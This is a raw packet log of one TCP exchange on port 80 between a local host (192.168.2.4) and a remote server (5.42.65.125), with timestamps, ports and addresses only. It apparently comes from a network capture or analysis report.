Dec 27, 2023 18:12:25.053427935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053428888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.053438902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053451061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053462029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053472996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053473949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.053486109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053497076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053502083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.053512096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.054377079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054389000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054399967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054410934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.054410934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054421902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054429054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.054434061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054445028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054455996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054457903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.054466963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054474115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.054478884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.054507971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.055187941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055228949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055268049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.055274010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055286884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055298090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055310965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.055325985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055337906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055351973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.055377007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.055382013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055393934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055404902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.055428982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.056015968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056052923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.056066036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056077957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056088924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056099892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056108952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.056160927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056174040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056185007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056195021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.056195974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056209087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.056221962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.056236029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.057039022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057080984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.057121992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057135105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057147026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057157993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057168961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057169914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.057180882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057193041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057198048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.057209969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057219982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.057221889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057244062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.057888985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.057924032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.058024883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058101892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058156013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058167934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058192015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.058196068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058214903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.058223009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058262110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.058336020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058365107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058379889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058412075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.058876991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058914900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.058939934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058950901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058963060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058974981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.058983088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059005976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059037924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059103966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059117079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059128046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059137106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059140921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059171915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059720039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059732914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059762955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059787035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059798956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059811115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059822083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059822083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059849024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059900045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059912920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059923887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059933901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.059936047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.059958935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.060765982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.060779095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.060820103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.060825109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.060861111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.060868979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.060890913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.060990095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061002970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061013937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061022997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061026096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061038971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061052084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061064959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061582088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061594963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061606884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061630964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061654091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061674118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061686039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061697006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061707973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061717033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061719894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061732054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061738968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.061744928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.061773062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.062515020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062527895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062539101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062550068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062561989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062563896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.062573910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062597990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.062601089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062613964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062624931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062632084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.062637091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.062658072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.063349009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063360929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063407898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.063503027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063515902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063527107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063536882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.063538074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063550949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063561916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063569069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.063574076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063585997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.063595057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.063607931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.064210892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064372063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064383030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064393997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064404964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064412117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.064416885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064428091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064440012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064446926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.064450979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064462900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064466000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.064474106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.064481974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.064517021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.065206051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065218925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065258026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.065274954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065288067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065299988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065330029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.065344095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065356016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065367937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065378904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065391064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065392971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.065402985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.065412998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.065423965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.066175938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066188097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066200972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066212893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066220999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.066251993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.066293001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066307068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066319942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066329002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.066333055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066355944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.066406965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066420078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066431999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.066441059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.066468000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.067116976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067176104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067188025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067199945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067212105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067220926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.067224026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067253113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.067266941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.067275047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067331076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067344904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067356110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067368031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.067368031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.067394972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068126917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068140984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068164110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068191051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068202972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068213940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068224907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068226099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068248034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068633080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068666935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068701982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068715096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068737030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068747997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068748951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068803072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068816900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068823099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068828106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068840027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068851948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068859100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068862915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.068888903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.068906069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.069595098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069632053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069649935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069694042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069694042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.069706917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069731951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.069824934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069837093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069853067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069858074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.069866896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069880009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069885969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.069891930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.069911957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.070728064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070741892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070753098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070764065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070775986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070775986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.070789099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070808887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.070873022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070887089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070898056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070909023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.070909977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070921898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.070934057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.070956945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.071521044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071532965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071543932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071554899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071573973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071583033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.071611881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.071624994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071638107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071650028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071659088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.071672916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071685076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.071686029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071697950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.071726084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.072443008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072482109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.072515965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072527885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072540045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072550058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072561026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.072561979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072586060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.072973013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.072993040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073009014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.073016882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073029041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073052883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073060989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.073092937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.073185921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073198080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073209047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073220968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073227882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.073231936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073251009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073256016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.073288918 CET	49738	80	192.168.2.4	5.42.65.125
